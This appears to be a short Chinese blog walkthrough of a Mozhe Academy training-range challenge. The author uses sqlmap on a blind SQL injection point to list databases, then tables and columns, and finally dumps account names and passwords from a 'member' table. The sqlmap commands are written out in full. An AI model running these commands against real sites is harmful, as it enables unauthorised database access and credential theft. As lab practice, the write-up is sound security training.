本次sqlmap使用环境为墨者学院靶场------>墨者学院靶场
这关主要是在不知道用户名和密码的情况下利用sql盲注跑出账号和密码。手工注入这里就不说了,主要讲一下这次使用sqlmap的体验。
假如小伙伴像我一样刚使用sqlmap建议先看一下这篇文章,写的蛮详细。------>sqlmap使用教程
点击下方的维护公告可以发现这个页面有一个明显的注入点,我们用sqlmap测试一下
python sqlmap.py -u "url"
这个id是一个注入点 sqlmap也给出了playload。
接着我们继续跑出他的数据库:
python sqlmap.py -u "url" --dbs
跑出来五个数据库,这里我们并没有看到任何提示,只能一个一个的试,试到stormgroup时发现这个库里有东西。
继续跑出他里的表:-D stormgroup --tables
继续跑:-T member --colums
还跑:-D stormgroup -T member -C name,password,status --dump
账号密码就在这里了。第一个被禁用了,密码是第二个!
语句还是要多练习。
网友评论